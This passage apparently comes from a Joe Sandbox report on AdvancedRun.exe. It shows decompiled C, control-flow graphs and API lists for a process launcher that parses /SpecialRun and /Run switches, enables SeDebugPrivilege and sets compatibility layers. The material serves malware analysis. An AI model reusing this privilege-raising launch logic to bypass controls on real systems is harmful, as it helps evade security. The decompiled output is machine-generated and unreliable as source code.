                                                                  • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                  • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                  • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                  • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004022D5, Relevance: 61.7, APIs: 25, Strings: 10, Instructions: 435COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 4022d5-402395 call 40b550 memset * 3 call 404923 wcschr 5 4023a6-4023ac 0->5 6 402397-4023a0 ExpandEnvironmentStringsW 0->6 7 40241a-402423 5->7 8 4023ae-4023c0 wcschr 5->8 6->5 10 402425-402434 wcschr 7->10 11 40244b-402468 call 404b5c 7->11 8->7 9 4023c2-402403 memset SearchPathW 8->9 9->7 12 402405-402419 call 404923 9->12 13 402473-40247c 10->13 14 402436-402449 ExpandEnvironmentStringsW 10->14 11->13 17 40246a-402470 11->17 12->7 19 40247e-402488 13->19 20 40248f-40249a 13->20 14->17 17->13 19->20 22 4024a0-4024a7 20->22 23 402537-40253d 20->23 22->23 26 4024ad-402531 memset * 2 call 4052f3 * 2 _wtoi * 2 22->26 24 402543-40254a 23->24 25 4025da-4025e3 23->25 24->25 28 402550-4025d4 memset * 2 call 4052f3 * 2 _wtoi * 2 24->28 29 4025e5-4025eb 25->29 30 40265d-402666 25->30 26->23 28->25 35 402633 29->35 36 4025ed-4025f9 wcschr 29->36 32 402668 30->32 33 40266b-402675 30->33 32->33 39 402683-40268b 33->39 40 402677-40267e call 401d1e 33->40 37 402634-40265a _snwprintf 35->37 36->35 42 4025fb-402631 memset ExpandEnvironmentStringsW 36->42 37->30 45 4026a3-4026ac 39->45 46 40268d-402693 39->46 40->39 42->37 50 4026b5-4026b8 45->50 51 4026ae-4026b3 45->51 46->45 48 402695-40269e call 401d1e 46->48 48->45 54 4026c6-4026cc 50->54 55 4026ba 50->55 53 4026bf-4026c1 call 401d1e 51->53 53->54 56 4026d5-4026db 54->56 57 4026ce-4026d3 54->57 55->53 60 4026e4-4026ea 56->60 61 4026dd-4026e2 56->61 59 402700-402702 call 401d1e 57->59 65 402707-402710 59->65 62 4026f3-4026f9 60->62 63 4026ec-4026f1 60->63 61->59 62->65 66 4026fb 62->66 63->59 67 402712-402731 call 405497 call 4055ec call 40135c 65->67 68 40276d-402770 65->68 66->59 88 402733-402738 call 4014e9 67->88 89 40273d-402754 call 401421 67->89 70 402776-4027bf call 405497 * 2 call 40149f call 4055ec call 40135c call 401551 68->70 71 40280b-40280e 68->71 113 4027c1-4027c6 call 4014e9 70->113 114 4027cb-4027e2 call 401421 70->114 72 402810-402811 71->72 73 402813 71->73 76 402814-402819 SetEnvironmentVariableW 72->76 73->76 79 40281f-40284a call 401fe6 76->79 91 40284c-40284f 79->91 92 40288e-40289c call 4055d1 79->92 88->89 103 402756 89->103 104 402759-402768 call 4054b9 89->104 91->92 97 402851-402857 91->97 97->92 101 402859-402888 call 401a3f GetProcessAffinityMask SetProcessAffinityMask 97->101 101->92 103->104 112 402803-402809 104->112 112->79 113->114 118 4027e4 114->118 119 4027e7-402801 call 4054b9 * 2 114->119 118->119 119->112
                                                                  C-Code - Quality: 83%
                                                                  			E004022D5(void* __ecx, void* __edx, void* __eflags, long _a4, long _a8) {
				WCHAR* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				char* _v24;
				int _v28;
				intOrPtr _v32;
				int _v36;
				int _v40;
				char _v44;
				void* _v56;
				int _v60;
				char _v92;
				void _v122;
				int _v124;
				short _v148;
				signed int _v152;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				void _v192;
				char _v196;
				char _v228;
				void _v258;
				int _v260;
				void _v786;
				short _v788;
				void _v1314;
				short _v1316;
				void _v1842;
				short _v1844;
				void _v18234;
				short _v18236;
				char _v83772;
				void* __ebx;
				void* __edi;
				void* __esi;
				short* _t174;
				short _t175;
				signed int _t176;
				short _t177;
				short _t178;
				int _t184;
				signed int _t187;
				intOrPtr _t207;
				intOrPtr _t219;
				int* _t252;
				int* _t253;
				int* _t266;
				int* _t267;
				wchar_t* _t270;
				int _t286;
				void* _t292;
				void* _t304;
				WCHAR* _t308;
				WCHAR* _t310;
				intOrPtr* _t311;
				int _t312;
				WCHAR* _t315;
				void* _t325;
				void* _t328;

				_t304 = __edx;
				E0040B550(0x1473c, __ecx);
				_t286 = 0;
				 *_a4 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				memset( &_v192, 0, 0x40);
				_v60 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 = 0;
				_v40 = 0;
				_v28 = 0;
				_v36 = 0;
				_v32 = 0x100;
				_v44 = 0;
				_v1316 = 0;
				memset( &_v1314, 0, 0x208);
				_v788 = 0;
				memset( &_v786, 0, 0x208);
				_t315 = _a8;
				_t328 = _t325 + 0x24;
				_v83772 = 0;
				_v196 = 0x44;
				E00404923(0x104,  &_v788, _t315);
				if(wcschr(_t315, 0x25) != 0) {
					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
				}
				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
					_v8 = _t286;
					_v1844 = _t286;
					memset( &_v1842, _t286, 0x208);
					_t328 = _t328 + 0xc;
					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
					if(_v1844 != _t286) {
						E00404923(0x104,  &_v788,  &_v1844);
					}
				}
				_t308 =  &(_t315[0x2106]);
				if( *_t308 == _t286) {
					E00404B5C( &_v1316,  &_v788);
					__eflags = _v1316 - _t286;
					_t315 = _a8;
					_pop(_t292);
					if(_v1316 == _t286) {
						goto L11;
					}
					goto L10;
				} else {
					_v20 = _t308;
					_t270 = wcschr(_t308, 0x25);
					_pop(_t292);
					if(_t270 == 0) {
						L11:
						_t174 =  &(_t315[0x220e]);
						if( *_t174 != 1) {
							_v152 = _v152 | 0x00000001;
							_v148 =  *_t174;
						}
						_t309 = ",";
						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
							_v152 = _v152 | 0x00000004;
							_t266 =  &_v260;
							_push(_t266);
							L0040B1F8();
							_v180 = _t266;
							_t328 = _t328 + 0x3c;
							_t267 =  &_v124;
							L0040B1F8();
							_t292 = _t267;
							_v176 = _t267;
						}
						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
							_v260 = _t286;
							memset( &_v258, _t286, 0x3e);
							_v124 = _t286;
							memset( &_v122, _t286, 0x3e);
							_v8 = _t286;
							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
							_v152 = _v152 | 0x00000002;
							_t252 =  &_v260;
							_push(_t252);
							L0040B1F8();
							_v172 = _t252;
							_t328 = _t328 + 0x3c;
							_t253 =  &_v124;
							_push(_t253);
							L0040B1F8();
							_v168 = _t253;
						}
						_t310 =  &(_t315[0x105]);
						if( *_t310 != _t286) {
							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
								_push(_t310);
							} else {
								_v18236 = _t286;
								memset( &_v18234, _t286, 0x4000);
								_t328 = _t328 + 0xc;
								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
								_push( &_v18236);
							}
							_push( &_v788);
							_push(L"\"%s\" %s");
							_push(0x7fff);
							_push( &_v83772);
							L0040B1EC();
							_v24 =  &_v83772;
						}
						_t175 = _t315[0x220c];
						if(_t175 != 0x20) {
							_v12 = _t175;
						}
						_t311 = _a4;
						if(_t315[0x2254] == 2) {
							E00401D1E(_t311, L"RunAsInvoker");
						}
						_t176 = _t315[0x265c];
						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
						}
						_t177 = _t315[0x265e];
						if(_t177 != 1) {
							__eflags = _t177 - 2;
							if(_t177 != 2) {
								goto L37;
							}
							_push(L"16BITCOLOR");
							goto L36;
						} else {
							_push(L"256COLOR");
							L36:
							E00401D1E(_t311);
							L37:
							if(_t315[0x2660] == _t286) {
								__eflags = _t315[0x2662] - _t286;
								if(_t315[0x2662] == _t286) {
									__eflags = _t315[0x2664] - _t286;
									if(_t315[0x2664] == _t286) {
										__eflags = _t315[0x2666] - _t286;
										if(_t315[0x2666] == _t286) {
											L46:
											_t178 = _t315[0x2a6e];
											_t358 = _t178 - 3;
											if(_t178 != 3) {
												__eflags = _t178 - 2;
												if(_t178 != 2) {
													__eflags =  *_t311 - _t286;
													if( *_t311 == _t286) {
														_push(_t286);
													} else {
														_push(_t311);
													}
													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
													L63:
													_t293 = _t311;
													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
													_t312 = _t184;
													if(_t312 == _t286 && _v60 != _t286) {
														_t363 = _t315[0x266c] - _t286;
														if(_t315[0x266c] != _t286) {
															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
															_a4 = _a4 | 0xffffffff;
															_a8 = _t286;
															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
														}
													}
													E004055D1(_t184,  &_v44);
													return _t312;
												}
												E00405497( &_v92);
												E00405497( &_v228);
												E0040149F(__eflags,  &_v92);
												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
												E00401551( &_v228, _t304, __eflags,  &_v92);
												_t204 = _a4;
												__eflags =  *_a4;
												if(__eflags != 0) {
													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
												}
												E00401421( &_v44, _t304,  &_v92, __eflags);
												_t207 = _v28;
												__eflags = _t207;
												_v16 = 0x40c4e8;
												if(_t207 != 0) {
													_v16 = _t207;
												}
												_v12 = _v12 | 0x00000400;
												E004054B9( &_v228);
												E004054B9( &_v92);
												_t286 = 0;
												__eflags = 0;
												L58:
												_t315 = _a8;
												_t311 = _a4;
												goto L63;
											}
											E00405497( &_v92);
											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
											_t359 =  *_t311 - _t286;
											if( *_t311 != _t286) {
												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
											}
											E00401421( &_v44, _t304,  &_v92, _t359);
											_t219 = _v28;
											_v16 = 0x40c4e8;
											if(_t219 != _t286) {
												_v16 = _t219;
											}
											_v12 = _v12 | 0x00000400;
											E004054B9( &_v92);
											goto L58;
										}
										_push(L"HIGHDPIAWARE");
										L45:
										E00401D1E(_t311);
										goto L46;
									}
									_push(L"DISABLEDWM");
									goto L45;
								}
								_push(L"DISABLETHEMES");
								goto L45;
							}
							_push(L"640X480");
							goto L45;
						}
					}
					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
					L10:
					_v20 =  &_v1316;
					goto L11;
				}
			}

































































                                                                  0x004022d5
                                                                  0x004022dd
                                                                  0x004022e7
                                                                  0x004022ec
                                                                  0x004022f7
                                                                  0x004022fa
                                                                  0x004022fd
                                                                  0x00402300
                                                                  0x00402307
                                                                  0x0040230d
                                                                  0x0040230e
                                                                  0x00402318
                                                                  0x00402321
                                                                  0x00402324
                                                                  0x00402327
                                                                  0x0040232a
                                                                  0x0040232d
                                                                  0x00402334
                                                                  0x00402337
                                                                  0x0040233e
                                                                  0x0040234f
                                                                  0x00402356
                                                                  0x0040235b
                                                                  0x0040235e
                                                                  0x0040236d
                                                                  0x00402374
                                                                  0x0040237e
                                                                  0x00402395
                                                                  0x004023a0
                                                                  0x004023a0
                                                                  0x004023ac
                                                                  0x004023cf
                                                                  0x004023d2
                                                                  0x004023d9
                                                                  0x004023de
                                                                  0x004023f6
                                                                  0x00402403
                                                                  0x00402414
                                                                  0x00402419
                                                                  0x00402403
                                                                  0x0040241a
                                                                  0x00402423
                                                                  0x00402458
                                                                  0x0040245d
                                                                  0x00402464
                                                                  0x00402467
                                                                  0x00402468
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00402425
                                                                  0x00402428
                                                                  0x0040242b
                                                                  0x00402433
                                                                  0x00402434
                                                                  0x00402473
                                                                  0x00402473
                                                                  0x0040247c
                                                                  0x00402481
                                                                  0x00402488
                                                                  0x00402488
                                                                  0x00402495
                                                                  0x0040249a
                                                                  0x004024b7
                                                                  0x004024be
                                                                  0x004024cd
                                                                  0x004024d1
                                                                  0x004024ed
                                                                  0x004024f0
                                                                  0x00402506
                                                                  0x0040250b
                                                                  0x00402512
                                                                  0x00402518
                                                                  0x00402519
                                                                  0x0040251e
                                                                  0x00402524
                                                                  0x00402527
                                                                  0x0040252b
                                                                  0x00402530
                                                                  0x00402531
                                                                  0x00402531
                                                                  0x0040253d
                                                                  0x0040255a
                                                                  0x00402561
                                                                  0x00402570
                                                                  0x00402574
                                                                  0x00402590
                                                                  0x00402593
                                                                  0x004025a9
                                                                  0x004025ae
                                                                  0x004025b5
                                                                  0x004025bb
                                                                  0x004025bc
                                                                  0x004025c1
                                                                  0x004025c7
                                                                  0x004025ca
                                                                  0x004025cd
                                                                  0x004025ce
                                                                  0x004025d4
                                                                  0x004025d4
                                                                  0x004025da
                                                                  0x004025e3
                                                                  0x004025eb
                                                                  0x00402633
                                                                  0x004025fb
                                                                  0x00402608
                                                                  0x0040260f
                                                                  0x00402614
                                                                  0x00402624
                                                                  0x00402630
                                                                  0x00402630
                                                                  0x0040263a
                                                                  0x0040263b
                                                                  0x00402646
                                                                  0x0040264b
                                                                  0x0040264c
                                                                  0x0040265a
                                                                  0x0040265a
                                                                  0x0040265d
                                                                  0x00402666
                                                                  0x00402668
                                                                  0x00402668
                                                                  0x00402672
                                                                  0x00402675
                                                                  0x0040267e
                                                                  0x0040267e
                                                                  0x00402683
                                                                  0x0040268b
                                                                  0x0040269e
                                                                  0x0040269e
                                                                  0x004026a3
                                                                  0x004026ac
                                                                  0x004026b5
                                                                  0x004026b8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004026ba
                                                                  0x00000000
                                                                  0x004026ae
                                                                  0x004026ae
                                                                  0x004026bf
                                                                  0x004026c1
                                                                  0x004026c6
                                                                  0x004026cc
                                                                  0x004026d5
                                                                  0x004026db
                                                                  0x004026e4
                                                                  0x004026ea
                                                                  0x004026f3
                                                                  0x004026f9
                                                                  0x00402707
                                                                  0x00402707
                                                                  0x0040270d
                                                                  0x00402710
                                                                  0x0040276d
                                                                  0x00402770
                                                                  0x0040280b
                                                                  0x0040280e
                                                                  0x00402813
                                                                  0x00402810
                                                                  0x00402810
                                                                  0x00402810
                                                                  0x00402819
                                                                  0x0040281f
                                                                  0x00402836
                                                                  0x00402841
                                                                  0x00402846
                                                                  0x0040284a
                                                                  0x00402851
                                                                  0x00402857
                                                                  0x00402860
                                                                  0x00402865
                                                                  0x00402876
                                                                  0x00402879
                                                                  0x00402888
                                                                  0x00402888
                                                                  0x00402857
                                                                  0x00402891
                                                                  0x0040289c
                                                                  0x0040289c
                                                                  0x00402779
                                                                  0x00402784
                                                                  0x0040278d
                                                                  0x004027a4
                                                                  0x004027b3
                                                                  0x004027b8
                                                                  0x004027bb
                                                                  0x004027bf
                                                                  0x004027c6
                                                                  0x004027c6
                                                                  0x004027d1
                                                                  0x004027d6
                                                                  0x004027d9
                                                                  0x004027db
                                                                  0x004027e2
                                                                  0x004027e4
                                                                  0x004027e4
                                                                  0x004027e7
                                                                  0x004027f4
                                                                  0x004027fc
                                                                  0x00402801
                                                                  0x00402801
                                                                  0x00402803
                                                                  0x00402803
                                                                  0x00402806
                                                                  0x00000000
                                                                  0x00402806
                                                                  0x00402715
                                                                  0x00402729
                                                                  0x0040272e
                                                                  0x00402731
                                                                  0x00402738
                                                                  0x00402738
                                                                  0x00402743
                                                                  0x00402748
                                                                  0x0040274d
                                                                  0x00402754
                                                                  0x00402756
                                                                  0x00402756
                                                                  0x00402759
                                                                  0x00402763
                                                                  0x00000000
                                                                  0x00402763
                                                                  0x004026fb
                                                                  0x00402700
                                                                  0x00402702
                                                                  0x00000000
                                                                  0x00402702
                                                                  0x004026ec
                                                                  0x00000000
                                                                  0x004026ec
                                                                  0x004026dd
                                                                  0x00000000
                                                                  0x004026dd
                                                                  0x004026ce
                                                                  0x00000000
                                                                  0x004026ce
                                                                  0x004026ac
                                                                  0x00402443
                                                                  0x0040246a
                                                                  0x00402470
                                                                  0x00000000
                                                                  0x00402470

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00402300
                                                                  • memset.MSVCRT ref: 0040233E
                                                                  • memset.MSVCRT ref: 00402356
                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                  • wcschr.MSVCRT ref: 00402387
                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                    • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                    • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                  • wcschr.MSVCRT ref: 004023B7
                                                                  • memset.MSVCRT ref: 004023D9
                                                                  • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                  • wcschr.MSVCRT ref: 0040242B
                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                  • memset.MSVCRT ref: 004024BE
                                                                  • memset.MSVCRT ref: 004024D1
                                                                  • _wtoi.MSVCRT ref: 00402519
                                                                  • _wtoi.MSVCRT ref: 0040252B
                                                                  • memset.MSVCRT ref: 00402561
                                                                  • memset.MSVCRT ref: 00402574
                                                                  • _wtoi.MSVCRT ref: 004025BC
                                                                  • _wtoi.MSVCRT ref: 004025CE
                                                                  • wcschr.MSVCRT ref: 004025F0
                                                                  • memset.MSVCRT ref: 0040260F
                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                  • _snwprintf.MSVCRT ref: 0040264C
                                                                  • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                  • GetProcessAffinityMask.KERNEL32 ref: 00402879
                                                                  • SetProcessAffinityMask.KERNEL32 ref: 00402888
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                  • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                  • API String ID: 2452314994-435178042
                                                                  • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                  • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                  • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                  • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00408533, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 259COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 89%
                                                                  			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
				char _v0;
				WCHAR* _v4;
				void* __edi;
				void* __esi;
				void* _t76;
				void* _t82;
				wchar_t* _t85;
				void* _t86;
				void* _t87;
				intOrPtr _t92;
				wchar_t* _t93;
				intOrPtr _t95;
				int _t106;
				char* _t110;
				intOrPtr _t115;
				wchar_t* _t117;
				intOrPtr _t124;
				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12);
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}




































                                                                  0x00408533
                                                                  0x00408533
                                                                  0x00408536
                                                                  0x0040853e
                                                                  0x00408546
                                                                  0x0040854d
                                                                  0x00408559
                                                                  0x00408563
                                                                  0x00408569
                                                                  0x00408572
                                                                  0x00408583
                                                                  0x0040858d
                                                                  0x00408595
                                                                  0x0040859e
                                                                  0x004085a2
                                                                  0x004085a6
                                                                  0x004085aa
                                                                  0x004085ae
                                                                  0x004085b8
                                                                  0x004085c1
                                                                  0x004085c8
                                                                  0x004085cd
                                                                  0x004085cf
                                                                  0x0040867f
                                                                  0x00408688
                                                                  0x0040868d
                                                                  0x0040868f
                                                                  0x00408730
                                                                  0x00408735
                                                                  0x00408737
                                                                  0x0040873d
                                                                  0x00408750
                                                                  0x0040875d
                                                                  0x00408763
                                                                  0x00408770
                                                                  0x00408775
                                                                  0x00408779
                                                                  0x0040878b
                                                                  0x00408790
                                                                  0x004087a2
                                                                  0x004087aa
                                                                  0x004087b8
                                                                  0x004087be
                                                                  0x004087c3
                                                                  0x004087c9
                                                                  0x004087d2
                                                                  0x004087df
                                                                  0x004087e3
                                                                  0x004087e6
                                                                  0x00408801
                                                                  0x004087e8
                                                                  0x004087f8
                                                                  0x004087fe
                                                                  0x00408811
                                                                  0x00408816
                                                                  0x00408816
                                                                  0x0040881c
                                                                  0x00408822
                                                                  0x00408779
                                                                  0x00408824
                                                                  0x00408829
                                                                  0x00408833
                                                                  0x00408834
                                                                  0x00408840
                                                                  0x00408848
                                                                  0x0040884c
                                                                  0x00408850
                                                                  0x00408855
                                                                  0x0040885a
                                                                  0x00408860
                                                                  0x004088ac
                                                                  0x004088b1
                                                                  0x004088b3
                                                                  0x004088bf
                                                                  0x004088c5
                                                                  0x004088cb
                                                                  0x004088da
                                                                  0x004088ea
                                                                  0x004088ed
                                                                  0x004088f8
                                                                  0x004088ff
                                                                  0x00408905
                                                                  0x004088b5
                                                                  0x004088b5
                                                                  0x004088b5
                                                                  0x00000000
                                                                  0x00408862
                                                                  0x00408862
                                                                  0x0040886d
                                                                  0x00408874
                                                                  0x0040887b
                                                                  0x00408882
                                                                  0x00408889
                                                                  0x00408895
                                                                  0x00408897
                                                                  0x00408658
                                                                  0x00408658
                                                                  0x0040865d
                                                                  0x00408661
                                                                  0x0040866a
                                                                  0x00408673
                                                                  0x00408678
                                                                  0x00000000
                                                                  0x00408678
                                                                  0x00408860
                                                                  0x00408695
                                                                  0x00408695
                                                                  0x0040869f
                                                                  0x004086a2
                                                                  0x004086af
                                                                  0x004086a4
                                                                  0x004086a7
                                                                  0x004086a7
                                                                  0x004086b4
                                                                  0x004086bf
                                                                  0x004086cb
                                                                  0x004086d3
                                                                  0x004086d7
                                                                  0x004086db
                                                                  0x004086e0
                                                                  0x004086f1
                                                                  0x004086f8
                                                                  0x004086ff
                                                                  0x00408706
                                                                  0x0040870d
                                                                  0x00408719
